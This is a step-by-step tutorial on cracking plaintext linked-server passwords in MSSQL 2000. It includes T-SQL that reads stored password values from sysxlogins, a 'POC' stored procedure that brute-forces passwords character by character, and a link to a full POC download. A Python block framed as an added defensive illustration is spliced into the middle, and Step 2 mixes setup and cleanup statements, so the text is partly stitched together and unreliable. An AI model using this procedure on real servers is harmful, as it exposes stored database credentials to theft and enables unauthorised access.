How to crack the plaintext password of an MSSQL 2000 linked server
MSSQL has a LINKSERVER (linked server) function, which is used to connect to another server. In the stored password, each character is encrypted into 4 characters. You do not need to worry about the encryption algorithm.
View my version number
Then run the following code to check my connection.
Code statement: Exec sp_helpserver
Now we can see that there are 6 connections in the database. Now I want to create a new linkserver connection named dhlinkserver.
Step 1: first create a linkserver
sp_addlinkedserver 'dhlinkserver','','SQLOLEDB','127.0.0.1','','','master'
The execution is successful.
Check the connection again. Seven connections are displayed. Now, create a table to store the HASH value.
After creating a linkserver connection, add a new account and password to the connection.
Code area:
EXEC sp_addlinkedsrvlogin
    'dhlinkserver', -- alias of the linked server (if the alias JOY was used in sp_addlinkedserver, JOY is also used here)
    'false',
    NULL,
    'test123', -- account
    'test123'  -- password
After the execution is successful: the account is test123 and the password is test123.
Query the passwords stored in the current database:
Statement execution
select name,master.dbo.fn_VarBinToHexStr(password)pass from master.dbo.sysxlogins
Next I will create a linkserver connection named www.
At this point, no linkserver connection named www is displayed.
There is another way to create a linkserver, and I will use this second method to create the link. The first method is described in step 1 of this article, so I will not explain it again.
The second method is to directly create a connection.
Exec sp_addlinkedserver @server = 'server' -- 'server' is the name of the linked server to create
Now we can query whether the connection is successfully created.
Query statement: Exec sp_helpserver
As mentioned above, this is the www connection. Create a login for the www connection with user name test12 and password test12. Let's see if the hash is the same.
OK, it is created successfully. Query the password.
We can see that each character is encrypted into four characters. The login added to the previous linkserver connection was username: test123, password: test123.
Comparing the two, one password character fewer means four fewer digits of encrypted output.
Username: test123 pass: 0xc7fb432df59950d1b05c1edb5a6f
Username: test12 pass: 0xc7fb432df59950d1b05c1edb
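The comparison above can be reproduced offline. The following is an added example, not code from the original article: it splits the two stored values quoted on this page into blocks of four hex digits and reports what they reveal. The function names are this example's own.

```python
# Added illustration, not code from the article. Function names are this
# example's own; the two stored values are the ones quoted above.

def blocks(stored_hex, width=4):
    """Split a stored password value (hex text, as printed by
    fn_VarBinToHexStr) into blocks of 4 hex digits, one per character."""
    digits = stored_hex.strip().lower()
    if digits.startswith("0x"):
        digits = digits[2:]
    if len(digits) % width:
        raise ValueError("length is not a multiple of the block width")
    if digits:
        int(digits, 16)  # raises ValueError if the text is not hex
    return [digits[i:i + width] for i in range(0, len(digits), width)]

def shared_prefix(a, b):
    """Count the leading blocks that two stored values have in common."""
    count = 0
    for x, y in zip(blocks(a), blocks(b)):
        if x != y:
            break
        count += 1
    return count

def leak_report(entries):
    """entries maps a login name to its stored value. For each login, return
    the password length the value reveals and the longest run of leading
    characters it shares with any other login's password."""
    report = {}
    for name, value in entries.items():
        shared = [shared_prefix(value, other)
                  for other_name, other in entries.items() if other_name != name]
        report[name] = {"length": len(blocks(value)),
                        "shared_prefix": max(shared, default=0)}
    return report

# Values from the article: logins test123 and test12 (password = login name).
SAMPLES = {
    "test123": "0xc7fb432df59950d1b05c1edb5a6f",
    "test12": "0xc7fb432df59950d1b05c1edb",
}

if __name__ == "__main__":
    for login, info in leak_report(SAMPLES).items():
        print(login, info, blocks(SAMPLES[login]))
```

The two t's in test123 come out as different blocks (c7fb and 50d1), so the encoding depends on position, yet the first six blocks of both values are identical. The stored value therefore carries no per-login salt and exposes both the password length and any prefix shared between logins, which is why read access to master.dbo.sysxlogins should be treated as access to the passwords themselves.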
Step 2: Create a table to store the calculated HASH
Execute the statement:
create table mssql (list int not null identity (1,1), pass nvarchar(500),code varbinary(256))
sp_dropserver 'dhlinkserver', 'droplogins'
drop table mssql
DROP PROCEDURE pwd
The table is created successfully. Next, create the stored procedure used for cracking.
Step 3: Create a stored procedure for cracking
POC:
create procedure pwd
    @pwd sysname = NULL
AS
declare @ss varchar(256), @str varchar(256), @getpass varbinary(256)
truncate table mssql
create table #t (inetpub nvarchar(500))
select @ss = @pwd + 'abcdefghijklmnopqrstuvwxyz`0123456789-=[]\;,./~!@#$%^&*()_+{}|:<>?'
declare @index int
select @index = 1
while (@index <= len(@ss))
begin
    insert #t(inetpub) select SUBSTRING(@ss, @index, 1)
    select @index = @index + 1
    select @str = @pwd + inetpub from #t
    exec master.dbo.sp_addlinkedsrvlogin 'dhlinkserver', 'false', Null, 'xxxx', @str
    select @getpass = password from master.dbo.sysxlogins where name = 'xxxx'
    insert into mssql(pass, code) values (@str, @getpass)
end
select list, pass, master.dbo.fn_VarBinToHexStr(code) code from mssql
drop table #t
Step 4: query the password stored in the current database
select name,master.dbo.fn_VarBinToHexStr(password)pass from master.dbo.sysxlogins
Related Materials
Step 1 Details:
sp_addlinkedserver 'dhlinkserver','','SQLOLEDB','127.0.0.1','','','master'
sp_addlinkedserver creates a linked server, which allows distributed, heterogeneous queries against OLE DB data sources. After a linked server is created with sp_addlinkedserver, the server can run distributed queries. If the linked server is defined as Microsoft SQL Server, remote stored procedures can be executed.
'dhlinkserver' is the name of the connection being created. The connection uses SQLOLEDB to access 127.0.0.1 remotely, and 'master' is the database the connection accesses.
More information about this connection is available at http://www.jb51.net/article/14194.htm
Step 2 details:
create table mssql (list int not null identity (1,1), pass nvarchar(500),code varbinary(256))
sp_dropserver 'dhlinkserver', 'droplogins'
drop table mssql
DROP PROCEDURE pwd
The first line is the CREATE TABLE statement that creates the table.
sp_dropserver removes a server from the list of known remote and linked servers on the local Microsoft SQL Server.
Syntax: sp_dropserver [@server =] 'server' [, [@droplogins =] {'droplogins' | NULL}]
'dhlinkserver' is the name of the linkserver connection established in the previous step.
Complete testing POC:
Link: http://pan.baidu.com/s/1mgh7QL6 password: 1n29